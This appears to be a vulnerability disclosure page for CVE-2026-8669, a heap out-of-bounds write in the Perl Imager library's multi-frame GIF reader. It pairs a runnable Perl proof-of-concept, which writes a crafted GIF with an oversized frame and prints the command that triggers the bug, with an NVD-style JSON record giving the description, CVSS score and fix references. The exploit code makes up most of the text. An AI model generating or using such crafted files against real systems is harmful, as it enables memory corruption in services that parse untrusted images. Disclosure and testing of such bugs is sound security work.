CVE-2026-8669

# PoC for CVE-2026-8669 # This script generates a malicious multi-frame GIF file designed to trigger # the heap out-of-bounds write in Imager <= 1.030. # The vulnerability occurs because the frame width (100) exceeds the logical screen width (10). use strict; use warnings; my $poc_file = "cve_2026_8669_poc.gif"; # 1. GIF Header and Logical Screen Descriptor # Signature: GIF89a # Width: 10 bytes (0x000A) # Height: 10 bytes (0x000A) my $header = "GIF89a" . pack("v", 10) . pack("v", 10); # Packed Fields: Global color table flag (1), Color resolution (7), Sort flag (0), Size of GCT (7 -> 256) # Background Color Index: 0 # Pixel Aspect Ratio: 0 $header .= "\xF7\x00\x00"; # 2. Global Color Table (Simplified, just black) $header .= "\x00\x00\x00" x 256; # 3. Application Extension (Looping) $header .= "\x21\xFF\x0BNETSCAPE2.0\x03\x01\x00\x00\x00"; # 4. Image Descriptor (The malicious frame) # Image Separator: 0x2C # Left, Top: 0, 0 # Width: 100 (0x0064) - This is larger than Screen Width (10) # Height: 10 # Packed Fields: Local Color Table flag (0) my $img_desc = "\x2C" . pack("v", 0) . pack("v", 0) . pack("v", 100) . pack("v", 10) . "\x00"; # 5. Image Data # LZW Minimum Code Size: 8 my $data_subblocks = "\x08"; # Data Sub-block: Size 255, filled with 'A's (arbitrary data) # This data will overflow the GifRow buffer during DGifGetLine $data_subblocks .= "\xFF" . ("A" x 255); # Block Terminator $data_subblocks .= "\x00"; # 6. GIF Trailer my $trailer = "\x3B"; # Write the file open(my $fh, '>', $poc_file) or die "Cannot open $poc_file: $!"; binmode($fh); print $fh $header . $img_desc . $data_subblocks . $trailer; close($fh); print "[+] Malicious GIF file generated: $poc_file\n"; print "[+] To test vulnerability, use Imager to read the file:\n"; print " perl -MImager -e 'Imager->new(file=>\"$poc_file\")'\n";

{"cve": {"id": "CVE-2026-8669", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-15T15:16:57.043", "lastModified": "2026-05-15T22:16:56.887", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Imager versions through 1.030 for Perl allow a heap out of bounds (OOB) write on crafted multi-frame GIF files.\n\nImager::File::GIF's i_readgif_multi_low allocates a single per-row buffer GifRow sized for the GIF's global screen width 'SWidth' and reuses it across every image in the file.\n\nThe page-match branch validates Image.Width + Image.Left > SWidth before each DGifGetLine write, but the parallel skip-image branch at imgif.c:790-805 calls DGifGetLine(GifFile, GifRow, Width) with no such check."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://github.com/tonycoz/imager/commit/782e9c06cc75a0f7eed383f39522f51f44598b04.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://metacpan.org/release/TONYC/Imager-1.031/source/Changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/15/17", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}